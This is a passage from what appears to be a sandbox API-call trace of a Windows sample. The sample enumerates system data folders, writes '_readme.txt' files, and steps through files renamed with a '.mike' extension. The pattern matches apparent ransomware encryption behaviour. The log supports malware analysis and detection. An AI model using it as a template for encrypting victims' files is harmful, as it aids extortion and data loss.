lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.523] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0138.523] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), fInfoLevelId=0x0, lpFileInformation=0x21d3594 | out: lpFileInformation=0x21d3594*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1bd485c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1bd485c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1bd94880, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x25220)) returned 1 [0138.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0138.524] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", dwFileAttributes=0x80) returned 1 [0138.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0138.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0138.527] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\_readme.txt", lpFilePart=0x0) returned 0x36 [0138.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0138.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0138.528] WriteFile (in: hFile=0x280, lpBuffer=0x21d5184*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x21d5184*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0138.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0138.530] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1bd94880, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1bd94880, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0138.531] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0138.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0138.531] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.532] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.532] CoTaskMemFree (pv=0x4e1c10) [0138.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.532] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData", lpFilePart=0x0) returned 0x26 [0138.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0138.533] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1b115500, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1b115500, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0138.533] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1b115500, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1b115500, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.533] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb35800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xecb35800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1b1d3be0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0138.534] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0x1b1f9d40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0138.534] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b115500, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1b115500, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1b13b660, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDataBookmarks.dat", cAlternateFileName="RACWMI~2.DAT")) returned 1 [0138.534] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b030cc0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1b030cc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1b0c9240, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 1 [0138.534] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.535] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0138.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0138.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0138.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0138.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0138.536] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0138.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0138.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0138.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0138.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0138.537] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0138.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0138.538] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpFilePart=0x0) returned 0x36 [0138.538] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpFilePart=0x0) returned 0x36 [0138.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0138.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0138.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.539] WriteFile (in: hFile=0x280, lpBuffer=0x21dae68*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21dae68*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0138.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0138.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0138.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.541] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0138.544] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.545] SetFilePointer (in: hFile=0x280, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0138.547] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.548] SetFilePointer (in: hFile=0x280, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0138.549] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.551] SetFilePointer (in: hFile=0x280, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x7800 [0138.552] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.554] SetFilePointer (in: hFile=0x280, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xa000 [0138.555] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.556] SetFilePointer (in: hFile=0x280, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xc800 [0138.557] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.558] SetFilePointer (in: hFile=0x280, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xf000 [0138.559] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.561] SetFilePointer (in: hFile=0x280, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x11800 [0138.561] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.563] SetFilePointer (in: hFile=0x280, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x14000 [0138.564] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.565] SetFilePointer (in: hFile=0x280, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x16800 [0138.566] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.567] SetFilePointer (in: hFile=0x280, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x19000 [0138.568] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.570] SetFilePointer (in: hFile=0x280, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b800 [0138.570] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.572] SetFilePointer (in: hFile=0x280, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1e000 [0138.573] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.574] SetFilePointer (in: hFile=0x280, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x20800 [0138.575] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.577] SetFilePointer (in: hFile=0x280, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x23000 [0138.578] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.580] SetFilePointer (in: hFile=0x280, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x25800 [0138.584] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.585] SetFilePointer (in: hFile=0x280, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x28000 [0138.587] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.588] SetFilePointer (in: hFile=0x280, lDistanceToMove=174080, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2a800 [0138.589] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.590] SetFilePointer (in: hFile=0x280, lDistanceToMove=184320, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2d000 [0138.592] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, 